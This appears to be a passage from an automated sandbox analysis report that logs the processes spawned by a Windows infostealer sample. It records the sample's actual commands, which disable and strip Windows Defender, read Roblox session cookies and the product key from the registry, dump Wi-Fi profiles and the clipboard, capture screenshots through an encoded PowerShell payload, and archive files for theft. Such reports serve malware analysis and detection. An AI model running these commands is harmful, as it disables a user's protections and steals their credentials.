CgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaia